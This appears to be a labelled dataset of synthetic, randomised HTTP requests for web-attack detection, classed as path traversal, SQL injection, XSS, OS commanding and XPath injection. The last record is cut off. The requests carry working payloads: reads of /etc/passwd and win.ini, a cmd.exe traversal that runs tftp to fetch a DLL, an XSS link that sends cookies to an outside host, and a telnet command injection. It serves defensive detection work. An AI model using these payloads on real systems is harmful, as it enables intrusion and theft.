End - Id: 50098
Start - Id: 36339
class: PathTransversal
GET /ne/aQM5Wc/PAjO1Z9ewq2Zqe/QY-gm/Cteiscn5beooe/evmD7ND9SV1/8oriobhxSeTa/5DFzrOiCatAc/rXaomarlog/o42kRS5iHxrM.MDu_/et2iTveFnaawnet.msf?iHt61nafccvnhno=9918&uetcJj.Pa0SformQ=%2Fetc%2Fpasswd&xcy30vouUqr=1%3A HTTP/1.0
Host: 66.163.219.171:8834
Connection: close
Accept: */*
Accept-Charset: big5;q=0.6, euc-cn, euc-jp;q=0.2, euc-kr;q=0.6, windows-1258;q=0.3
Accept-Encoding: 
Accept-Language: GAh62rrn-rocz6yh;q=0.7, 4teb-e;q=0.0
Cache-Control: no-store
Client-ip: 179.242.140.245
Cookie: uhtzeroi=2845;gsp2isruApo0OpL=361209;oftltijegosecM=9530;qdoi=8;8xftXwinntDk=dh>r\
Cookie2: $Version="046"
Date: Sat, 02 Jul 05 09:53:11 CET
ETag: W/"tsYw13ebqOwIYmPl_3q"
Expect: 100-continue
From: ee11@seia.cz
If-Modified-Since: Fri, 19 May 06 20:00:42 CET
If-Unmodified-Since: Sat, 19 Aug 06 22:42:12 CET
If-Match: *
If-None-Match: "othgk8Zr41xdFW1cnjFU"
If-Range: "0W1qai27wuJFw3Qaz1j3"
Max-Forwards: 890
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest response="Fa230DfDdCBDc8d6dFdD9e980dE5c6ab"
Authorization: Digest realm
Range: 94941-674,-88804,1546-98301
Referer: http://www.bVdierca.com/Atehlerr/acePNoMa/db8atty/EhKCweaf.cfm
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.1 (X11; U; Linux i386 9.8; ge-la; rv:0.5.9) Gecko/68644116
UA-CPU: StrongARM
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 002x9850
Via: FTP/2.6 www.oeqoT2.gif, 8.2 www.isysD.css, 2.3 146.195.20.190
Transfer-Encoding: identity
Upgrade: eu5/4.0, mt8ten/8.9, s8ho/9.0, nroaa/5.2, 0uhn4/9.3
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 9001886715622
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36339
Start - Id: 42220
class: SqlInjection
GET /uMR8-_8Hz8/a8/enuoErjst.gif?Ewp-cbin89qBV.YV=uzcAhgci5v&eeoreriM3lowloz=hihsgde&yaayeseq=+eg+FarEDR+a&cr=853852201&hav3b=917331723&CQSA=%27+%2B++%28+++++SELECT+TOP+++1+++wrTibq+++++FROM+++++3hhioov%29+++++%2B+%27&r9enabauritn4d=dnr&PjlinkKVBHA=see&ajrm6LOvpiqnph-=6d2esDett1zpennu&tOoi=leysovorhD&aekI5sotasqs=62048 HTTP/1.1
Host: www.asnn4gNdX.ch:37524
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 97.137.241.136
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="35"
Date: Fri, 15 Jun 07 20:15:45 CET
ETag: W/"tXiGyLYJXuOw39ER0"
Expect: cttahr1o
From: 6bttom@2kOpyg.org
If-Modified-Since: Wed, 15 Apr 09 24:11:50 GMT
If-Unmodified-Since: Mon, 05 Jun 06 09:27:29 CET
If-Match: "NCKukWukmNVxIKFT5p"
If-None-Match: "E@mk8FxwZdsOt_Ws.L6"
If-Range: Thu, 17 Dec 09 03:59:25 CET
Max-Forwards: 3
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic emg1ZWk5ZWE6NHNMZWdEdTk=
Authorization: Digest response="3dFEc973fFBDaf8DdAccD8fD761432C3"
Range: -66
Referer: http://0tn9.it/Sgunri/onwlE/fmex.mdb
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.1 (Windows; U; Win 9x 6.3; nh-ea; rv:2.9.4) Gecko/15162180
UA-CPU: x86
UA-Disp: 814,8344,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 451x3766
Via: FTP/8.0 www.4He8ilw.shtml, 1d5eu/3.8 76.171.56.196, 6.0 123.216.0.165:62
Transfer-Encoding: identity
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42220
Start - Id: 46913
class: XSS
POST /3eu@RnOAaMQ/wpCyITtfyhoR/engdAkznpeth.cfm? HTTP/1.0
Content-Length: 420
Content-Language: I,udeas,n3
Content-Encoding: deflate
Content-Location: http://www.8hOluhW.gov/c6rdlThg/niRa8/2slrtr.nsf
Content-MD5: cm45ZG9naHNYeXFhcXRhdw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Wed, 26 Jan 05 12:03:45 CET
Host: www.e1eofn.biz
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-greek, iso-8859-7;q=0.2, windows-1250;q=0.3, ks_c_5601-1987
Accept-Encoding: identity, identity, identity, deflate;q=0.8, identity;q=0.4
Accept-Language: cnau6p-rehS2Dio, gr-La, xene5a1m-n4a, osE-mewri, adthte-hz;q=0.7
Cache-Control: no-store
Client-ip: 176.4.165.216
Cookie: tah=rnf;msqh=eg4H0KLmR1;U2IJ_R-e-=544;GserdlhhEl1dmv=eRt6CUVrUww;0FdQ31n@J=e1ue%sdN/0dd7nuehttpsn\exec&
Cookie2: $Version="1"
Date: Tue, 08 Dec 09 04:18:21 UTC
ETag: W/"utOApzZbAhT5WSy.P0"
Expect: 100-continue
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Tue, 28 Dec 04 16:44:26 UTC
If-Unmodified-Since: Wed, 28 Apr 04 01:03:42 UTC
If-Match: *
If-None-Match: "fVGh6Hz4BFoC-uY8Hu"
If-Range: Sat, 29 Apr 06 03:10:29 CET
Max-Forwards: 984
MIME-Version: 9.1
Pragma: 40srph='ismjai'
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM bnNyZ2xzaGVIbjludGVpYXNoZG5ob2lhZW50RWNoYzRlb21yTnQ=
Range: -790
Referer: /r1gttahs/nxat7d/pahere/utTtiab/oruquixn.jsp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.3 (compatible; MSIE 5.3; Windows NT; eobrp)
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8473x700
Via: 7.1 www.mRerr7t3.jpg, 4.0 177.44.101.16, HTTP/6.0 92.30.98.233
Transfer-Encoding: 2gtilt
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oramnerhc1=9&ovaihntraghh=90050856&obapi4mhE5n=sn&035tHi5=<link     rel   =    "     stylesheet     "   href =   "javascript: [document.location.replace    ('http://www.tr.com/cgi-bin/oneteretnt.cgi'+document.cookie);]   "   >&ve9lcBbodyYwgetz94=au?wnull&rme=secirs9<wie7&idhlaHtmC94e=tnbh&vxhDok1vubgsoundAi=468&ora=6o albinexecOrn&idv7script=eeiBEOn&eeiyfoxnlthp=tOetmd5

End - Id: 46913
Start - Id: 44318
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
Host: www.Bstoe.uk
Connection: Histh0e
Accept: */*;q=0.6
Accept-Charset: iso-8859-3;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 150.122.198.96
Cookie: 8ypeorhoretns=6;yPHphpscript=q8_IB;uimgbIxSNxhTV=29;9NHinnOFg=tB5
Cookie2: $Version="30"
Date: Thu, 27 Jan 05 08:11:13 CET
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "LRG0pPP2XtqJ6AhBRLhw"
If-None-Match: "PBInhx31w7nxij-"
If-Range: *
Max-Forwards: 28
MIME-Version: 2.9
Pragma: dsrrEr0a='elsfeii'
Proxy-Authorization: Basic dHN0bnRhbzpuYXV2ZA==
Authorization: Digest response="1dFb11EaFADBAFa04b6C8a388edCDdc3"
Range: -2
Referer: /UsgewbE/rehi5/u5hnis2.avi
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/9.9 (compatible; MSIE 7.5; Mac OS X; c4pee)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: HTTP/7.9 25.123.36.239
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44318
Start - Id: 43694
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.e6123trtr.net:80
Connection: keep-alive
Accept: text/xml, text/*;q=0.9, image/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 113.72.226.52
Cookie: 7sh=yiItn;soUataenms=auh0f(linkulzc';Nos=5729338;Ttpto=1566;majhaseme=A execn5;hE13tFere=3428
Cookie2: $Version="87"
Date: Fri, 09 Nov 07 10:51:56 CET
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: y3oqSbyn@4aAdpOcPia.gov
If-Modified-Since: Fri, 17 Mar 06 16:05:05 CET
If-Unmodified-Since: Sat, 13 May 06 14:41:11 CET
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: "L6PRZ9JqVZTekuICg"
If-Range: "Q2gRfeoVn9h94TAk2mu"
Max-Forwards: 474
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: /joetit.jpeg
TE: trailers,deflate;q=0.7
User-Agent: Mozilla/6.2 (X11; U; Linux i586 4.6; sr-ai; rv:1.2.6) Gecko/33513638
UA-CPU: StrongARM
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0204x5029
Via: 6.3 72.169.10.81:1, stlo/3.5 50.86.7.132:944, FTP/1.8 www.ytddYOt.tiff
Transfer-Encoding: deflate
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 43694
Start - Id: 45037
class: PathTransversal
POST /8x0H_8/qY3Ni/18/Ntdtpy25egepettot/-289/-zWpasswdS6Ab_4hRs/bmqklcOentdYeqf/qohci5/srPXDAfZ1Tz/rDe/0clAu3kF.cgi? HTTP/1.0
Content-Length: 213
Content-Language: ea,qno,8o
Content-Encoding: deflate
Content-Location: /6eRNmjof/rdeddr/reo70t.mpeg
Content-MD5: dHJwb2U0b2lzYzNheXRvZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 09 22:05:18 UTC
Last-Modified: Wed, 06 Dec 06 05:33:31 GMT
Host: www.4o9Coc.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.2, windows-1258, big5, iso-8859-7, iso-8859-6;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 165.94.243.42
Cookie: Ea=Al6heto;Px1JXOzmailg3VZ=a+ar@otA0te&<U>mochami;r4hrjt=690;aqaeiWrms8=95162;btTede6ei7e=./.././../
Cookie2: $Version="638"
Date: Fri, 16 Jul 04 16:21:21 GMT
ETag: W/"Pj1vKUMknyJV70j-yOh"
Expect: 100-continue
From: ordn@eEaog7iN6d.st
If-Modified-Since: Fri, 23 Dec 05 03:12:03 CET
If-Unmodified-Since: Mon, 11 Feb 08 10:08:42 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 89
MIME-Version: 7.0
Pragma: pklf=p2ef
Proxy-Authorization: NTLM aGphYVJvOGZSdDg0ZmVkb2F0R1JobDlsb3VleGxiY3BhcE5ycmNpcDVzZQ==
Authorization: Digest response="4ebDc8Fe71ad5bAf7Cc1FB32782588b6"
Referer: http://www.wjx5Oena.net/ewnt/o2tx.pl
TE: gzip;q=0.1
Trailer: Date
User-Agent: Mozilla/0.6 (compatible; Konqueror/9.0; Win98; oafwRnAnmf; ixT4l; desl)
UA-Color: color16
UA-Pixels: 6325x2725
Via: 4.4 www.anns.js, Ee4t/3.2 www.e7s9efcn.htm, HTTP/6.7 www.tnqd.gif
Transfer-Encoding: identity
Upgrade: ado/3.2, itnor/6.3
Warning: 517 www.n1bOS.jpg "aaleosr" 
X-Serial-Number: 5914360941701436
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

echoKbodyT=ruOQ&lhd=im37enpae2eh&atptrstinKn=d(gW63e&fsou=8549&rrBensmvxnhiret=tET&fosnch=500601&esm5sosjjnae=7and(&etizichciosae=tL5t&eiLzuauhscaAii=a=xe6u&srvuin7Itohetie=renf&echozhGacceptGi=t8kcusx51mCTm

End - Id: 45037
Start - Id: 49949
class: XPathInjection
GET /n4/tjZZ/esefW0fc/heprr3he5rcegtn/er7p0ie04T6hyiaod/owgAH7kP8jxy_/yLzIk9/ec71Shjm1MKsqJ/nhcEwizZ6bsj6Zh/eeSeeadne/U3SechoGsMo2cL6Z/u7swLni.aspx?5zh=32&BetcDKaY=2810+++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+068%3D&eypnl=l6loaEfsthea5u&iinfndElw6e=84&F8Fnph-Ax7Kgroup byk=aQxxf-6iqp&wonlNdaeleoWZa=f9&4twywtzxiicoe=ssystemlc&silsutieettm6ie=cmdytrn%3Dotjcs8&nibs=4 HTTP/1.0
Host: 119.232.228.203:2046
Connection: j6ai
Accept: image/*;q=0.8, video/mpeg, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=00
Client-ip: 6.57.199.123
Cookie: sfadtjtrnwninn=s ;hwcr=areox;hortk=3;ubVGjfgu=]asl ia;uyiii7o=3;cqrtimyymittenI=nNiCD
Cookie2: $Version="9"
Date: Fri, 08 Sep 06 03:13:45 CET
ETag: W/"Iy_DNmlUhoJDmsXeKRd"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Mon, 09 Jan 06 22:20:05 UTC
If-Unmodified-Since: Sun, 05 Jun 05 17:43:31 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Oct 08 07:49:07 GMT
Max-Forwards: 27
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: /saetgsa/mqaP/heoe.pdf
TE: trailers
Trailer: Expect
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 2.6; ct-8f; rv:9.1.2) Gecko/67597611
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 299x2707
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: ueeaak
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 150 www.dveacIt.jpeg "Sy2gleewctth" "Sat, 02 Jan 10 06:19:03 GMT"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49949
Start - Id: 36208
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.tiraMue.uk
Connection: keep-alive
Accept: image/png
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: 9-torcrd, r6gikG-qmte, k43ilLi-otbr;q=0.3
Cache-Control: no-store
Client-ip: 189.4.113.141
Cookie: 5vnctuyePlsnp=NraTx;Il7lesenS=rwonavr;e5b2fmiwemt=sxt\hSw 'Rnehno~n;nfTrom8ahtD=oflal8hShcxt;5x=3adepiIpl;imhbJetye6i4oE=26403
Cookie2: $Version="3"
Date: Mon, 04 Feb 08 06:21:35 CET
Expect: ctcvplr
From: aesn@tdnix0ah2.ch
If-Modified-Since: Fri, 18 Jun 04 21:07:23 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 14 Jun 05 13:22:36 GMT
Max-Forwards: 92
MIME-Version: 3.7
Pragma: no-cache
Authorization: Basic ZGhvbjpuZHRmcno=
Range: 414-,3823-
Referer: /oidaity/t1sir4tn.gif
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/3.3 (X11; U; Unix 1.3; cl-rm; rv:3.8.9) Gecko/92553076
Via: HTTP/4.7 www.obneerAc.shtml, FTP/3.0 142.96.237.198
Upgrade: sst2oo/6.7, eatt/1.0

null

End - Id: 36208
Start - Id: 45038
class: PathTransversal
PUT /efkdnneyacdnrz/jO.g7xOH0ORX1/TTPGrtI/eAsPl7.7/zvvzKu1HHAgP5k5dyX/gTN7MABwfQyyjG_wdwJ/atlVgQ2xP6Wu.shtml? HTTP/1.1
Content-Length: 155
Content-Language: otcN,dtStnrm,yum
Content-Encoding: compress
Content-Location: /6eRNmjof/rdeddr/reo70t.mpeg
Content-MD5: aXJnaHRpZWVlT2h1c3JpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 09 22:05:18 UTC
Last-Modified: Wed, 06 Dec 06 05:33:31 GMT
Host: 175.68.190.236
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: aBT=o3
Client-ip: 165.94.243.42
Cookie: P5-giUimgupdateodivV=aao.o..-;ein=iRd9dtahn;ENMbK0Nftps= od;ribbdedec=mz4bZFd5;1owhereNb5FvKreplaced=collection(    file:///c:/weq/nogHetbo.xml  )
Cookie2: $Version="638"
Date: Fri, 16 Jul 04 16:21:21 GMT
ETag: W/"Pj1vKUMknyJV70j-yOh"
Expect: 100-continue
From: ordn@eEaog7iN6d.st
If-Modified-Since: Fri, 23 Dec 05 03:12:03 CET
If-Unmodified-Since: Mon, 11 Feb 08 10:08:42 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 89
MIME-Version: 7.0
Pragma: yt='3be9'
Proxy-Authorization: perr8 unaittrc=nrLtja
Authorization: Basic Y2Uwc0M6ZUV5YWZhbA==
Referer: http://nCoge.uk/asen7.bin
TE: gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: esktnas/1.9.5.8.6
UA-Color: color16
UA-Pixels: 6325x2725
Via: 1.2 www.iOdn2c9.gif, HTTP/2.9 www.0oatb2.js, HTTP/8.5 www.adOwrTY.jpg
Transfer-Encoding: identity
Upgrade: ado/3.2, itnor/6.3
Warning: 517 www.n1bOS.jpg "aaleosr" 
X-Serial-Number: 5914360941701436
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iseyyo3teau=22&Cp5=4019&wL=g&&NFI7-KGuEbG=981043&pmtdcsrseedbld=nPLV0Dj_h0&ob9n8talrldilt=t(naLedt&vi3Enhthtn=65973184&sLtnnSstt9tsr=305745936&sDoh=nxg

End - Id: 45038
Start - Id: 46439
class: PathTransversal
PUT /5r/akNJW2rrq/iybhbiiqohyit/zM_Ip_me8OYCNOyC@SQ/J_X.E/Eei0lCtac/ocie/aiwhati/sauti1eeuivsihEte4/os/noAeiiai3eo/eC.vwkUGhaYFsclCHjx.js? HTTP/1.1
Content-Length: 225
Content-Language: n,Ne
Content-Encoding: compress
Content-Location: /slio4t.php
Content-MD5: RXRlbXNzdGhxaGVkd0V1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 May 04 20:18:25 UTC
Last-Modified: Thu, 11 Jan 07 03:44:31 GMT
Host: 89.232.212.26
Connection: liTjg
Accept: */*
Accept-Charset: windows-1253, us-ascii;q=0.3, windows-1255;q=0.0, x-mac-roman, isiri-3342
Accept-Encoding: \.\.\/\.\.\/etc\/tlggN.conf
Accept-Language: u1eh-oeieii, vrQuac4-taau2t9;q=0.5
Cookie2: $Version="954"
Date: Sat, 28 Jul 07 24:45:05 CET
If-Match: *
If-None-Match: "_VJC0VXnL466@HBa9"
If-Range: Sat, 14 Nov 09 07:27:13 CET
Max-Forwards: 422
Proxy-Authorization: NTLM ZWkyemh1bHB6d2kwZnJhY3NldHdvYXNlZDdpaEFlc2FpcjRwVG9Bb3RnbmVvZmU=
Authorization: edst ntDr0=tnuswr
Referer: /nyat.pdf
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 6.2; ge-ua; rv:9.8.5) Gecko/70163508
UA-CPU: MIPS
UA-Color: color32
Via: e9aer/6.6 167.82.43.160
Transfer-Encoding: tgrhi
----: ----------------------------------------

exToiiIkrotaI=aupA&Lqnisada=a&2eAaacuMtteeeos=0&lrfn=rVAdqrHO9&2etu1crx=aWdKEX2B&epviiomo=Ae7i6HtsnrUhftdg&nwam=o(o$&nl5aao=9039189445&ss2taphp450jsia=6'wads&wsweh5&@bU.JR9Bjmail2=4&vett5xa8hpite6l=2740&1aaenst2nF=l6X

End - Id: 46439
Start - Id: 43165
class: OsCommanding
GET /s8fJf/jOMbkWtmpQperlfv.msf?se=+l&petaeHeit7Nbd=7riTo3el1r3megriro&eof2b=32389&Araipaa=l1iO0&6gn=iideU&jnQ9TLLk=%5C%22%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++++www.attaenlele.com++681++%3B&d8ttniiawlnjn1h=1017629&udEscript2=hDEjmyd_a&snez7o5=pertdNSlte%40vumochai HTTP/1.0
Host: 48.205.195.36:3336
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-hebrew, iso-2022-jp;q=0.4, x-mac-korean, x-mac-chinesetrad, ks_c_5601-1987;q=0.7
Accept-Encoding: gzip;q=0.5, identity;q=0.1, gzip, identity, compress
Accept-Language: eha-i1faa;q=0.9, tSep1n-r7racos8, te6vht-iylh, ezLh-5;q=0.9
Cache-Control: only-if-cached
Client-ip: 229.240.5.133
Cookie: ssqsibs4=rIXeet7Ahgm;gR9TQoLexY=(3aseoaejr;nOUY0rinN=njVZ;temb=1;padei99td=cg twt;fr+ftpTimg+eo;iyeh2jRta=78
Cookie2: $Version="045"
Date: Sun, 16 Jan 05 05:09:20 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: ioszae@lf4lua.com
If-Modified-Since: Sat, 25 Sep 04 01:53:52 CET
If-Unmodified-Since: Thu, 04 Jan 07 23:29:44 UTC
If-Match: "@-6lEwOkAx4vQSf-"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: sunut6 3loaTnu4=nkxLfet
Range: 28678-4,-886
Referer: http://Urairy.net/iho2yara/htsRul3/nhlewrmd/yoofa/nobnedx.mpeg
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: tngw (gg60k-)
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 953x846
Via: 8.9 www.76e6tt.jpg, 4.0 159.231.168.92:53, 5.0 37.117.195.203
Transfer-Encoding: qrcQeh
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43165
Start - Id: 46072
class: PathTransversal
GET /z7iSs/usiuzneni7ho7od/aetmmhatghn/0rntoi/uBdW@M6U71/mht5teY07hfene/uddhdl/tP3Wyi/copy9/sSd.xtT9KozZ.dll?anys=298093398&aetedrrLl3TPc=472947671&Iaee8ogerosDeo0=49945&cmdU2cfpsqyv=xICoXTz7&owz2=rdnreal&6saogeieeeejlel=DO1 HTTP/1.1
Host: 108.49.41.26
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312, x-mac-ce;q=0.1, x-mac-greek;q=0.2
Accept-Encoding: 
Accept-Language: a2ne-pm2, gsiNwt-eTlimoe;q=0.9, e-bHgpeco;q=0.2, ioaik5g-aa, naoisye-7oit;q=0.6
Cache-Control: no-cache
Cookie: ZjXaQNbOfu7=jwbwprTfokso2Iaic;Id4nr=106486;5ropyso=N:/.htaccess~;jle=5tnelz
Date: Fri, 10 Dec 04 15:48:29 UTC
If-None-Match: "9oLN0MN-L76a4nRiT@X"
Max-Forwards: 47
Authorization: Digest uri=/naoetrl/6gmhZd/mfzSMt/brthita6/nNdaheP2.php
Referer: http://s6AvhSam.com/n9iec/cylYoin/abydedti.bin
User-Agent: 4ynsej (ligHHmS)
UA-CPU: x86
Via: 2.7 www.1elelr.tiff
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46072
Start - Id: 41802
class: SqlInjection
GET /lrqAfcandhjtjddtp/hEiea/aB_p9SYQM/ttres.shtml?to95neNrtdet=068245727&P73Gsock_streamcH=OR+%27uoraniusue%27+%3D+++++%27+++++%27&tohimr0=270605&kn6rekbt=4738728906&Kk6aeswoTaxr=5668&itetRfoh=eh&ii=o3axeet5ebody+jdsock_stream&Ae1Uor0niavyt=to5o&9asHourwgsx4x=94250&Igp9=ltentddueosteoee2&hLnubntatgans=O%24%28&mr=771 HTTP/1.0
Host: 170.58.185.185:509
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1258;q=0.8
Accept-Encoding: gzip, gzip, identity, compress, gzip
Accept-Language: *
Cache-Control: ltexi1ni=kzntjeiE
Client-ip: 175.74.180.28
Cookie: 4i1eta2cwMhtnfE=75;aewenN=tyahPjtebh;LBK6access_log=skd&epnp(rnk o;et=1;ieoo6Coopic9aI2=4snoEs3sis
Cookie2: $Version="6"
Date: Tue, 31 Oct 06 20:06:57 UTC
ETag: W/"u-p0upc_i-I_o6YnCF5"
Expect: ytnux=thiRx
From: ame9p@neehptrbo.fr
If-Modified-Since: Sat, 23 Sep 06 08:48:25 UTC
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: "77e92Z0oWxPyN5gW"
If-Range: *
Max-Forwards: 0327
MIME-Version: 8.5
Pragma: nner0e=nccidys
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Digest response="AfBa693E738c5312C3cc598A5b18d363"
Range: 6-,0-8
Referer: http://eoecBth6.biz/soknntw/piensi2s/6dNb.mp3
TE: gzip,trailers,deflate;q=0.4
Trailer: Max-Forwards
User-Agent: m9t7ekittetj
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1113x6739
Via: 9.1 www.etfpedp.gif
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 864 www.eeeoa.css "hlrre9anouesreagre4w" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 12063263563674128535
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41802
Start - Id: 39369
class: SSI
